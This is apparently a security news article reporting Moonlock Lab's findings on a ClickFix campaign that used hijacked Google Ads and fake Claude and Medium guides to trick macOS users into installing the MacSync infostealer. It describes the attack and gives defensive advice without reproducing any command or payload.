Hijacked Google Ads and Fake Claude AI Pages Used to Deliver MacSync Malware to macOS Users
scsecFebruary 18, 20262 Mins read 
ClickFix Campaign Uses Hijacked Google Ads and Fake Claude AI Guides to Infect Mac Users
Cybersecurity researchers at Moonlock Lab, the investigative arm of MacPaw, have uncovered a sophisticated ClickFix campaign targeting macOS users. The attack leverages hijacked Google Ads accounts and fake technical guides hosted on trusted platforms to trick victims into manually infecting their own systems.
The malware delivered in this campaign is a data-stealing infostealer known as MacSync.
How the Attack Begins
The infection chain starts with something as simple as a Google search.
Threat actors hijacked legitimate, verified Google Ads accounts belonging to:
- Earth Rangers, a Canadian children’s charity
- T S Q SA, a Colombian retailer
Because these advertiser accounts had established reputations and verification histories, their malicious ads bypassed Google’s automated security checks without raising red flags.
When users searched for common macOS-related terms such as:
- “online DNS resolver”
- “HomeBrew”
- “macOS CLI disk space analyzer”
They were shown sponsored results at the top of Google Search. These ads redirected users to malicious content disguised as legitimate technical documentation.
The Two Lures
Victims were funneled into one of two traps:
1. Fake Claude AI Guide
A public page hosted on Claude titled “macOS Secure Command Execution.”
The page appeared legitimate and had already accumulated more than 15,600 views before being identified as malicious.
2. Fake Medium Article
A fraudulent article hosted on Medium, designed to impersonate Apple’s official support documentation.
Both pages provided what appeared to be legitimate troubleshooting instructions.
The ClickFix Technique
The attack uses a social engineering tactic known as ClickFix.
Instead of exploiting a software vulnerability, attackers rely on user trust. The fake guides instruct victims to copy and paste a specific command into macOS Terminal to “fix” an issue or install a tool.
When executed, the command secretly downloads and installs the MacSync infostealer.
Because users manually run the command themselves, the malware bypasses many traditional security protections.
What MacSync Steals
MacSync is a highly capable infostealer and an evolved rebrand of an older malware strain called Mac.c.
Once installed, it searches for:
- macOS Keychain data (stored system passwords)
- Browser-saved credentials
- Cryptocurrency wallet private keys
- Other sensitive local data
The harvested information is compressed into a file named osalogging.zip and transmitted to the attackers’ Command-and-Control (C2) server.
Researchers believe both the Claude and Medium variants connect to the same backend infrastructure, suggesting a single threat actor group is behind the campaign.
AI Platforms Increasingly Abused
This is not the first time artificial intelligence platforms have been weaponized for malware distribution. Similar campaigns have previously abused tools like:
- ChatGPT
- Grok
By hosting malicious instructions on trusted platforms, attackers exploit user confidence in well-known brands.
Why This Attack Is Dangerous
This campaign highlights several troubling trends:
- Hijacking legitimate Google Ads accounts to bypass ad verification
- Abusing trusted publishing platforms
- Leveraging AI-branded content to increase credibility
- Using social engineering instead of technical exploits
- Continuously refining malware families
MacSync’s evolution from Mac.c demonstrates how threat actors adapt and upgrade their tools to evade detection and improve effectiveness.
How to Stay Safe
Security experts advise:
- Never paste commands into Terminal unless you fully understand what they do
- Avoid downloading software through sponsored search results
- Access tools and documentation directly from official websites
- Treat AI-generated technical guides with caution
Even trusted platforms can host malicious content if threat actors exploit them cleverly.
1 Comment
Leave a Reply
Related Articles
Fake Crypto Job Recruiters Trick Developers Into Installing Malware via Coding Challenges
Fake Job Recruiters Use Coding Challenges to Deploy Malware on Developers’ Systems...
287 Chrome Extensions Leak Browsing Data of 37.4 Million Users to Major Corporations
287 Chrome Extensions Leak Private Browsing Data of 37.4 Million Users A...
DNS-Powered ClickFix Attack Delivers PowerShell Malware and ModeloRAT to Windows Systems
New ClickFix Attack Uses DNS to Deliver PowerShell Payloads Researchers at Microsoft...
ZeroDayRAT: Telegram-Sold Spyware Enables Full Android and iOS Surveillance and Financial Theft
ZeroDayRAT Emerges as Powerful Cross-Platform Mobile Spyware Sold on Telegram Cybersecurity researchers...
“This ClickFix campaign is a serious reminder to Mac users: never paste Terminal commands from sponsored search results or unfamiliar guides. Always rely on official sources for software and troubleshooting to avoid MacSync and similar malware.”